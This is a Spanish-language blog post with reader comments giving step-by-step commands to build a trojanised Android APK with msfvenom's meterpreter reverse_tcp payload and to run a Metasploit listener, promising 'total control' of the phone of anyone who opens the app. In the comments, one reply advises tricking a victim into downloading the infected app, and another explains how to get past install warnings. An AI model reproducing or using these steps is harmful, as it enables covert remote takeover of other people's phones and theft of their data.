jueves, 1 de diciembre de 2016

Hackeando Android con Metasploit

Como sabéis estos dáis eh estado tocando mucho Android y me propuse a ver si podía vulnerar la seguridad de mi propio teléfono y así corregir los errores en el terminal y lo hice de la siguiente forma


Primero cree una apk infectada con Mestasploit tal que así

msfvenom -p android/meterpreter/reverse_tcp LHOST="IP" LPORT=444 > Nombredelarchivo.apk
Después solo deberemos activar el servicio con el comando:

service postgresql start
Y ahora entrar a la consola de Metasploit con:
msfconsole

Ahora activaremos el Payload con
set PAYLOAD android/meterpreter/reverse_tcp

Y pondremos nuestra ip local previamente comprovada con ifconfig
set LHOST "IP"

Y el puerto
set LPORT 444

Ya solo quedará activar el exploit y en cuanto alguien abra la app infectada tendremos control total de su teléfono
exploit

Y con eso habreamos accedido al teléfono android y tendremos total control

Aquí dejaré una serie de comandos útiles para cuando estemos dentro del terminal

--> COMANDOS

7 comentarios:

  1. Por que no me deja instalar la apk en el teléfono, donde puedo firmar mi apk para que no marque error?

    ResponderEliminar
  2. Deberías comprbar si tienes la opción de aplicaciones de origen desconocido desactivada. Hazlo y me dices, saludos!

    ResponderEliminar
  3. para sacarlo de mi red local, que hago?

    ResponderEliminar
  4. simplemente averigua el puerto en el que penetrar y la IP de tu víctima intenta que tu víctima descargue la aplicación infectada y a darle

    ResponderEliminar
  5. Quien tiene el metasploit para descargar? sea 32 o 64 bits

    ResponderEliminar
  6. Respuestas
    1. https://github.com/rapid7/metasploit-framework

      Eliminar